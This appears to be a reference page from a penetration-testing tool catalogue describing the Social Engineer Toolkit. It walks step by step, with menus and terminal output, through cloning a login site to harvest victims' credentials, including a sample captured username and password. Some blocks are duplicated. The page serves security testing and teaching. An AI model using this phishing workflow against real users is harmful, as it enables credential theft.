Menu
▾
▴
SET-en
SET
Phase(s):
Primary: Exploitation.
Secondary: N/A.
Description:
SET (Social Engineer Toolkit), tool that helps exploiting vulnerabilities in web applications based on the "human factor". It uses social engineering techniques to achieve successful attacks.
Objective:
- Obtain confidential information from users.
- Obtain access to the users systems.
Features:
Supported technologies: Web applications (HTTP/HTTPS).
Operative mode: Active.
Obtain confidential information from users.
- Provides several attack scenarios in order to obtain confidential information for the users such as: Java Applet Attack Method, Metasploit Browser Exploit Method, Credential Harvester Attack Method, Tabnabbing Attack Method, Man Left in the Mtiddle Attack Method, Web Jacking Attack Method, etc.
Obtain access to the users systems.
- Provides the functionalities to gain access to the users system in order to compromise the systems such as executing system commands, opening a back door, etc.
Reports:
Output reports: X
Basic usage:
Perform a mirror of a trusted web site in order to steal user’s credentials. The following command initiates the tool main menu.
./set
The main menu displays the tool configuration options; select the first option “Social-Engineering Attacks”.
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit
Next, select the second option “Website Attack Vectors”.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
Next, select the third option “Credential Harvester Attack Method” in order to harvest the user credentials from a web application.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Mtiddle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate 99) Return to Main Menu
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Mtiddle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate 99) Return to Main Menu
Select the second option “Site Cloner” to provide the trusted web site URL address in order to obtain a local mirror of the site.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Provide the IP address of the machine that will harvest the user credentials.
set:Webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a Website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a Website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1
Provide the trusted web site URL address to be cloned.
[-] Example: http://www.thisisafakesite.com
set:Webattack> Enter the url to clone: URL_A_CLONAR.
set:Webattack> Enter the url to clone: URL_A_CLONAR.
The tool will then begin with the cloning process.
[*] Cloning the Website: https://login.url.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
Note: In case an Apache web server is currently running in the harvesting machine on the port 80 the tool will request permission to stop it so the cloned site can be published.
[*] Information will be displayed to you as it arrives below:
[*] Looks like the Web_server can't bind to 80. Are you running Apache?
Do you want to attempt to disable Apache? [y/n]: y
* Stopping Web server
apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
... waiting
[ OK ]
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
[*] Looks like the Web_server can't bind to 80. Are you running Apache?
Do you want to attempt to disable Apache? [y/n]: y
* Stopping Web server
apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
... waiting
[ OK ]
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
The published “cloned” site will then be available on the URL address: http:// IP_address/index.html. When the process is completed the tool will display a message.
IP_USUARIO - - [14/Nov/2013 16:43:15] "GET / HTTP/1.1" 200 -
When the user access the “cloned” site and provides their user credentials the tool will capture the petition and display the information on the terminal.
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVpgu8gq
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=360
PARAM: lgnrnd=144204_hbWo
PARAM: lgnjs=1384469624
POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com
POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345
PARAM: persistent=1
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
PARAM: lsd=AVpgu8gq
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=360
PARAM: lgnrnd=144204_hbWo
PARAM: lgnjs=1384469624
POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com
POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345
PARAM: persistent=1
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Finally, the tool can be stopped by pressing the key combination “Ctrl+C”.
Resources:
Link: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Author(s): David Kennedy
Contact: irc.freenode.net canal #setoolkit
License: BSD licensing